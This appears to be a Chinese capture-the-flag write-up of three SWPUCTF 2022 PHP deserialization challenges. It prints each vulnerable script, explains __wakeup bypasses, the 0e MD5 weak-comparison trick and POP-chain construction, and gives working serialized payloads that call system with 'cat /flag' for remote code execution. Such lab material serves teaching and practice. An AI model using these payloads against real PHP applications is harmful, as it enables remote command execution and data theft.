[SWPUCTF 2022 新生赛]ez_1zpop(php反序列化之pop链构造)
[SWPUCTF 2022 新生赛]ez_ez_unserialize
<?php
class X
{public $x = __FILE__;function __construct($x){$this->x = $x; }function __wakeup(){if ($this->x !== __FILE__) {$this->x = __FILE__; }}function __destruct(){highlight_file($this->x);//flag is in fllllllag.php flag在fllllllag.php文件里}
}
if (isset($_REQUEST['x'])) { @unserialize($_REQUEST['x']); //将x反序列化输出
} else {highlight_file(__FILE__);
}因为flag在fllllllag.php文件里,所以要让fllllllag.php文件在x中,让x等于这个文件的序列化
对x进行序列化操作:
<?php
class X
{public $x ='fllllllag.php';
}
$a=new X();
echo serialize($a);
?>//输出:O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}绕过__wakeup()函数,构造payload: 得到flag
?x=O:1:"X":2:{s:1:"x";s:13:"fllllllag.php";}
__wakeup()函数漏洞原理:
当序列化字符串表示对象属性个数的值 大于 真实个数的属性时就会跳过__wakeup的执行
[SWPUCTF 2022 新生赛]1z_unserialize
<?php//包含了一个名为lyh的类,该类有公共属性:url、lt和lly
class lyh{ public $url = 'NSSCTF.com';public $lt;public $lly;function __destruct() //魔术方法__destruct(),在对象被销毁时调用{$a = $this->lt; //尝试执行一个由$this->lt引用的函数,并将$this->lly作为参数传递给该函数。 $a($this->lly); }}
unserialize($_POST['nss']); //从POST请求中的nss参数读取序列化的数据,并进行反序列化操作
highlight_file(__FILE__);?>赋值执行RCE:
直接将 $a 赋值为 system ,即将 $this->lt 赋值为 system ,那么 $this->lly 就可以赋值任意命令执行RCE。
将$this->lly赋值成ls /查看根目录,POST传参nss发现存在flag文件。
将$this->lly赋值成cat /flag读取flag。
<?php
class lyh
{public $url = 'NSSCTF.com';public $lt="system";public $lly="cat /flag";}
$a=new lyh();
echo serialize($a);
?>//输出:O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}
php反序列化之pop链构造
做pop类题目要紧盯魔术方法。
需要找到普通类与魔术方法之间的联系,理出一种逻辑思路,通过这种逻辑思路来构造一条pop链,从而达到攻击的目的。
在构造调用链时,先找到调用链的头和尾。头一般都是能传参以及可以反序列化的地方,而尾部一般都是可以执行恶意代码的地方。
[SWPUCTF 2022 新生赛]ez_1zpop
代码审计
<?php
error_reporting(0);
class dxg //定义类dxg,其中只有一个方法fmm()
{function fmm() {return "nonono";}
}class lt //定义类lt,包含公共属性impo、md51、md52
{public $impo='hi';public $md51='weclome';public $md52='to NSS';function __construct() //__construct()类的构造函数,创建对象时触发 {$this->impo = new dxg; //实例化了dxg类的对象并赋值给impo属性}function __wakeup() //__wakeup()方法在反序列化对象时被调用{$this->impo = new dxg; //也实例化了dxg类的对象,并返回fmm()方法的结果return $this->impo->fmm();}function __toString() //__toString()把对象当成字符串调用时触发{if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)return $this->impo->fmm(); //返回impo属性的fmm()方法的结果}function __destruct() //__destruct()方法在对象销毁前被调用,它会调用__toString()方法并输出结果。 {echo $this;}
}class fin //定义类fin,包含公共属性a和一个方法fmm()
{public $a;public $url = 'https://www.ctfer.vip';public $title;function fmm(){$b = $this->a; //fmm()方法调用了属性a所指向的函数,并将属性title作为参数传递。$b($this->title); }
}if (isset($_GET['NSS'])) { //检查是否存在$_GET['NSS']参数,存在,对NSS进行反序列化$Data = unserialize($_GET['NSS']);
} else {highlight_file(__file__);
}如果$this->impo 已设置,并且 $this->md51 = $this->md52 的 MD5 哈希值,同时 $this->md51 和 $this->md52 值不相等。就会调用 $this->impo->fmm() 方法。
function __toString(){if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)return $this->impo->fmm();}0e绕过MD5弱比较:
令md51='s155964671a'; md52='s214587387a';
构造pop链:先把用到的类写出来,形成一个框架,然后补充类中的变量,再将用到的类进行实例化。
<?php
class lt
{#设置 $this->md51 = $this->md52 的 MD5 哈希值public $impo='hi';public $md51='s155964671a';public $md52='s214587387a';
}
class fin
{#赋值执行RCE:$a="system",$title="cat /flag"public $a='system';public $url = 'https://www.ctfer.vip';public $title='cat /flag';
}
#实例化类
$lt = new lt();
$fin = new fin();
#链子
$lt->impo=$fin;
echo serialize($lt);
?>//输出:O:2:"lt":3:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s155964671a";s:4:"md52";s:11:"s214587387a";}得到输出后,记得绕过wakeup(),GTE传参NSS构造payload: 得到flag
?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s155964671a";s:4:"md52";s:11:"s214587387a";}